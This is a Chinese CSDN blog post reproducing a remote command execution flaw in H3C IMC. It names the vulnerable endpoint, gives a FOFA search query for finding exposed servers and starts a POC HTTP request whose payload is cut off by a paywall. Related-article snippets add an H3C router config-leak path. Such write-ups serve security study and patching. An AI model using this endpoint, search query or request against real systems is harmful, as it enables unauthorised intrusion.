【漏洞复现】H3C IMC智能管理中心命令执行漏洞

最新推荐文章于 2024-05-22 16:43:45 发布
最新推荐文章于 2024-05-22 16:43:45 发布
阅读量1.3k 收藏 7
点赞数 13
文章标签: 安全 网络 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37113223/article/details/136151643
版权
【漏洞复现】 专栏收录该内容
146 篇文章 1 订阅

已下架不支持订阅

Nx01 产品简介

        H3C IMC(Intlligent Management Center)智能管理中心是H3C推出的下一代业务只能管理产品。

Nx02 漏洞描述

        H3C IMC dynamiccontent.properties.xhtm 存在远程命令执行,攻击者通过构造特殊的请求造成远程命令执行,从而获取服务器权限。

Nx03 产品主页

fofa-query: body="/imc/javax.faces.resource/images/login_help.png.jsf

Nx04 漏洞复现

POC:

POST /imc/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: {
  {Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 1567

pfdrt
了解本专栏 已下架不支持订阅
晚风不及你ღ
关注
  • 13
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录

已下架不支持订阅

漏洞复现 || H3C iMC 存在远程命令执行
失心少年
07-07 915
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!H3C Intelligent Management Center(以下简称 H3C iMC)是一款业务智能管理平台。攻击者可利用漏洞通过构造特殊的请求造成远程命令执行
H3CIMC功能介绍
05-07
很不错的H3C培训资料,综合网络产品的讲解,很有针对性。
H3C IMC 命令执行 Poc
soldi_er的博客
07-29 2688
文章目录漏洞复现漏洞描述FOFA搜索测试编写Poc脚本 漏洞复现 漏洞描述   H3C IMC dynamiccontent.properties.xhtm 存在远程命令执行,攻击者通过构造特殊的请求造成远程命令执行。 FOFA搜索   “/imc/login.jsf” && body="/imc/javax.faces.resource/images/login_help.png.jsf?ln=primefaces-imc-new-webui" 测试   打开搜索结果第一个,页面如图。
h3c网络管理系统任意文件读取漏洞(含批量验证poc)
2401_84264610的博客
05-16 443
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
H3C iMC 存在远程命令执行漏洞
nnn2188185的博客
04-22 3401
H3C Intelligent Management Center(以下简称 H3C iMC)是一款业务智能管理平台。 H3C Intelligent Management Center 存在命令执行漏洞。攻击者可利用漏洞通过构造特殊的请求造成远程命令执行
H3C任意命令执行漏洞
战神/calmness的博客
05-23 9336
H3C漏洞 目录 简述 过程 修复建议 参考链接 简述 H3C iMC智能管理中心 云计算(cloud computing):“云计算是一种计算模式,利用互联网技术把大量可扩展和弹性的IT相关能力作为一种服务提供给多个用户(Gartner)”。提供资源的网络被称为“云”。“云”中的资源在使用者看来是可以无限扩展的,并且可以随时获取,按需使用,随时扩展,这使得应用提供者无需为繁琐的细节而烦恼,能够更加专注于自己的业务,有利于创新和降低成本。 过程 body="iMC来宾接入自助管理..
(附nuclei yaml文件)H3C多款企业路由器actionpolicy_status信息泄露漏洞复现(管理员密码泄露)
最新发布
nglj9527的博客
05-22 669
漏洞位于/userLogin.asp页面,通过访问路径/userLogin.asp/…/actionpolicy_status/…/设备型号.cfg,可获取设备配置文件,进而获得WEB管理账号及密码。
H3C-IMC 自动发现功能如何使用
荒野求生的博客
04-04 2928
自动发现功能可以使iMC自动发现可以管理的设备,将自动发现的设备增加到iMC中进行管理。管理网划分合理的话,一次操作就可以将网络中所有的设备自动发现并网管。设备数量多时,可能存在SNMP参数配置不统一的情况,针对此问题iMC自动发现功能提供多个SNMP模板自动匹配功能,使用操作更加操作方便、快捷。 一、设备侧配置 确保设备和iMC网络可达,配置SNMP相关参数。 设备1关键配置:...
漏洞复现H3C-用户自助服务平台-imc-远程命令执行
知黑而守白
03-12 224
H3C用户自助服务平台是一种基于云计算和自动化技术的管理平台,旨在提供自助式、智能化的网络设备和服务管理解决方案。该平台通过集成多种功能和工具,帮助企业用户更高效地管理和维护其网络设备,并提供更好的用户体验。H3C用户自助服务平台 imc 接口存在一个命令执行漏洞,使得攻击者可以通过构造特定的请求远程执行恶意代码。此漏洞可能导致攻击者获取系统权限、执行任意命令,严重威胁系统的机密性和完整性。
1.H3C-iMC智能管理中心rce-exp编写
weixin_43976688的博客
09-07 305
这里需要发送post包,我们需要导入 requests 库,而且我们需要批量化而不是单个的操作,所以我们。本地创建一个 url.txt ,然后通过python去读取。我们为了批量验证是否目标存在漏洞,可以通过命令执行一个。最后我们可以把存在漏洞的url进行保存。接下来就是发送 post 包。那么说明该url是存在漏洞的。的问题,所以可能会弹一些警告。然后定义 post 内容。接下来就可以通过发送。因为可能会存在目标为。如何目标数据包回显存。
漏洞复现H3C 路由器多系列信息泄露漏洞
晚风不及你
02-19 2082
H3C路由器是一款高性能的路由器产品,具有稳定的性能和丰富的功能。它采用了先进的路由技术和安全机制,可以满足不同用户的需求,广泛应用于企业、运营商和数据中心等领域。
H3C imc7运维管理工具
04-16
H3C imc7运维管理工具,含eda、手册、使用说明,含配置举例。
H3C IMC技术专题汇总集.rar
02-12
H3C iMC技术专题之告警管理篇V1.0 H3C iMC技术专题之设备管理篇V1.0 H3C_iMC开局配置一指禅 V1.1 H3C_iMC技术专题之License篇V1.0 H3C_iMC技术专题之Portal认证篇V1.0 H3C_iMC技术专题之升级篇V1.0 H3C_iMC...
H3C iMC智能管理中心平台介绍.pdf
06-11
H3C iMC智能管理中心平台介绍.pdfH3C iMC智能管理中心平台介绍.pdfH3C iMC智能管理中心平台介绍.pdfH3C iMC智能管理中心平台介绍.pdfH3C iMC智能管理中心平台介绍.pdfH3C iMC智能管理中心平台介绍.pdfH3C iMC智能...
H3C iMC智能管理中心平台介绍.docx
06-11
H3C iMC智能管理中心平台是一款由H3C公司推出的下一代业务智能管理产品,旨在解决网络精细化管理的需求。随着网络规模的扩大、业务的丰富以及接入节点的增多,传统单一的管理工具已无法满足现代企业的网络管理需求。...
H3C IMC设备管理视频.zip
02-19
01-配置设备SNMP参数,手工添加设备到iMC中 02-自动发现设备-简易模式 03-自动发现设备-高级模式 04-配置设备访问参数 05-导入&导出设备列表 06-管理&取消管理设备 07-同步&刷新设备信息 08-管理&取消管理设备接口...
H3CIMC智能网管平台部署》培训视频.rar
08-01
H3C IMC智能网管平台部署》培训视频涵盖了多个关键知识点,旨在帮助用户深入理解和熟练掌握H3C智能管理平台(IMC)的安装与配置过程。以下是这些视频教程所涵盖的重要内容: 1. **IMC智能管理平台安装**:这...
H3C用户自助服务系统存在primefaces5.x表达式注入漏洞
weixin_43567873的博客
03-10 131
H3C用户自助服务系统存在primefaces5.x表达式注入漏洞
H3C-校园网自助服务系统-flexfileupload-任意文件上传-0day未公开漏洞
weixin_43167326的博客
02-23 698
H3C SecPath F50X0系列防火墙是新华三技术有限公司伴随Web2.0时代的到来并结合当前安全网络深入融合的技术趋势,针对大型企业园区网、运营商和数据中心市场推出的全新下一代高性能万兆防火墙产品。
imc智能管理中心下载
02-07
IMC智能管理中心是一款基于网络管理和监控的软件,可以帮助企业实现对网络设备和应用程序的集中化管理和监控。IMC智能管理中心提供了丰富的功能,包括网络设备配置管理、性能监控、安全管理、用户认证、流量分析等。 要下载IMC智能管理中心,首先需要访问官方网站或认可的软件下载网站,查找IMC智能管理中心的官方下载渠道。一般来说,官方网站会提供最新版本的软件下载链接,用户可以通过点击链接来下载安装程序。 在下载IMC智能管理中心之前,需要确保自己的计算机系统符合软件的最低系统要求,比如操作系统版本、内存大小、存储空间等。下载完成后,双击安装程序,按照向导逐步进行安装。安装完成后,可能需要根据实际情况进行注册或激活,然后就可以开始使用IMC智能管理中心了。 IMC智能管理中心的下载和安装过程相对简单,但在使用过程中,可能还需要进一步的学习和配置。建议用户在下载之后,通过阅读官方文档或相关教程,了解IMC智能管理中心的功能和操作方法,以充分发挥软件的管理和监控功能,提高企业网络管理的效率和安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值